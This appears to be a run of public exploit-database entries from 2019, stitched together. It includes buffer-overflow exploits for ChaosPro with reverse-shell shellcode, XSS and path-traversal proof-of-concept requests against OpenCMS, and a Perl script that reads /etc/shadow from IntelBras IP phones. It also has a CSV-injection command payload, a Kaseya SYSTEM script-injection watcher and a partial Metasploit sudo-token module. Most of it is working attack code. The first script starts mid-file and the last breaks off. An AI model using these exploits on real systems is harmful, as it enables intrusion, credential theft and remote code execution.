#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# stack alignment
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"
#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522
#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)
# baby nopsled
junk += "A" * 9
# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp
# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
junk += "A" * (
126
- 9 # nopsled
# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)
# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)
# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- 3 # baby nopsled
# part one of fourth set of bytes going onto the stack
- len(zero_eax)
# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)
# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- 4 # baby nopsled
- len(jmpback80)
)
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
# baby nopsled
junk += "AAAA"
# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- len(jmpback80)
- 4 # baby nopsled
# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)
# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- len(jmpforward06)
)
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
#!C:\Python27\python.exe
# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"
# our egghunter shellcode
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)
# our egg!
payload = "T00WT00W"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))
# our egghunter ...
junk += egghunter
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x50\x49\x40"
# write the evil file
with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235
1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```
Extended POCs: https://aetsu.github.io/OpenCms
#!/usr/bin/perl -w
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
# Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
# # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
# # ========================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # ========================================================================================================
# # > Authorization => Basic dXNlcjp1c2Vy
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
# # > Content-Type => application/x-www-form-urlencoded
# # < Accept-Ranges => bytes
# # < Server => SIPPhone
# # < Content-Type => text/html;charset=UTF-8
# # < Expires => -1
# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
# # < Client-Peer => 192.168.1.1
# # < Client-Response-Num => 1
# # ========================================================================================================
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
# # ========================================================================================================
# [test@localhost intelbras]$
#
# Simple Mode:
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';
print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";
if ($response->content =~ m/$file/g){
my $content = $response->content;
$content =~ s/$file//g;
$content =~ s/^\n+//;
print $content;
print "\n# ========================================================================================================\n";
exit;
} else {
print "# Exploit failed or full path is wrong..\n";
exit;
}
# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection
# Google Dork: inurl:"\wp-content\plugins\event-tickets"
# Date: 09-01-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://tri.be/
# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
# Version: Up to v4.107.1
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# Software description:
Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.
# Technical Details & Impact:
It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
# POC
1. Visit RSVP ticket enabled page
2. In Full name section add payload for CSV injection e.g.
=cmd|'/C ping -t 127.0.0.1'!A0
3. Login into WordPress and visit event details in All Post> Ticketed > Attendees.
4. Export Attendees list (.csv format).
5. Opening the file will execute malicious payload (command) on user system
# Timeline
02-08-2019 - Vulnerability discovered
02-08-2019 - Vendor contacted
02-08-2019 - Vendor responded
02-08-2019 - Detailed report shared
02-18-2019 - Contacted vendor on fixation status without any response
08-26-2019 - Full disclosure timeline given without any response
09-01-2019 - Full Disclosure
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237
For the tests, I used the payloads:
```
…%2f…%2fWEB-INF%2flogs%2fopencms.log
…%2f…%2fWEB-INF%2fweb.xml
```
1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```
3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```
Extended POCs: https://aetsu.github.io/OpenCms
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236
1. In Site Management > New site (Stored XSS):
- Affected resource title.0:
POC:
```
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
```
2. In Treeview (Reflected XSS):
- Affected resource type:
POC:
```
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
```
3. In Workspace tools > Login message (Stored XSS):
- Affected resource message.0:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=<svg
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
```
4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
```
5. In Index sources > View field configuration > New field configuration
(Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
```
6. In Account Management > Impor/Export user data (Reflected XSS):
- Affected resource oufqn:
POC:
```
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
HTTP/1.1
Host: example.com
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
```
7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources name.0 and description.0:
POC:```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
```
8. In Account Management > Organizational Unit > Organizational Unit
Management > New sub organizational unit (Stored XSS):
- Affected resources parentOuDesc.0 and resources.0:
POC:```
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
```
9. In Link Validator > External Link Validator > Validate External Links
(Reflected XSS):
- Affected resources reporttype, reportcontinuekey and title:
POC:```
POST
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
HTTP/1.1
Host: example.com
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
```
10. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
downloadGallery.0:
POC:```
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"
.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"
/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"
[...]
```
11. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"
gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"
testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"
test
[...]
```
Extended POCs: https://aetsu.github.io/OpenCms
# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
# Google Dork: N/A
# Date: 2-09-2019
# Exploit Author: NF
# Vendor Homepage: https://www.kaseya.com/products/vsa/
# Software Link: https://www.kaseya.com/products/vsa/
# Version: <= 9.5 agentmon.exe
# Tested on: Windows 10
# CVE : N/A
##Vulnerability##
This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian.
A a fix was put in place for the original CVE, however it was specific to binaries and not scripts.
The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process.
The Kaseya agent (agentmon.exe) runs as SYSTEM by default.
The agent also has a default working folder @ C:\kworking\
It will pull scripts and binaries to this folder and execute them from disk from the controlling web application.
By default the *Authenticated Users* group has all rights to this folder.
Scripts are written to disk however they are not checked for integrity prior to execution.
So a folder can be monitored for script files being dropped and then append malicious code prior to execution.
##Proof of concept##
This PowerShell script will monitor the default working directory.
When a ps1 script drops from a scheduled task or run from the VSA web application it will then append the command "Write-Host 'injected content'" which will run as SYSTEM.
Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script.
Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts
<--script start-->
$folder = 'c:\kworking'
$filter = '*.ps1'
$filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false;NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'}
Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action {
$path = $Event.SourceEventArgs.FullPath
"`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8
Unregister-Event FileCreated
}
<--script end-->
##Timeline##
16-06-2019 :: Issue found
18-06-2019 :: security@ emailed requesting steps to disclose
30-06-2019 :: CERT contacted due to non response of vendor from official email address
31-06-2019 :: CERT still unable to contact vendor
07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
20-08-2019 :: Vendor confirms receipt of details
27-08-2019 :: Email sent indicating intention to disclose due to lack of response
02-09-2019 :: No response through CERT. Findings published
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ptrace Sudo Token Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by blindly injecting into
the session user's running shell processes and executing commands by
calling `system()`, in the hope that the process has valid cached sudo
tokens with root privileges.
The system must have gdb installed and permit ptrace.
This module has been tested successfully on:
Debian 9.8 (x64); and
CentOS 7.4.1708 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'chaignc', # sudo_inject
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-03-24',
'References' =>
[
['EDB', '46989'],
['URL', 'https://github.com/nongiach/sudo_inject'],
['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
['URL', 'https://lwn.net/Articles/393012/'],
['URL', 'https://lwn.net/Articles/492667/'],
['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
],
'Platform' => ['linux'],
'Arch' =>
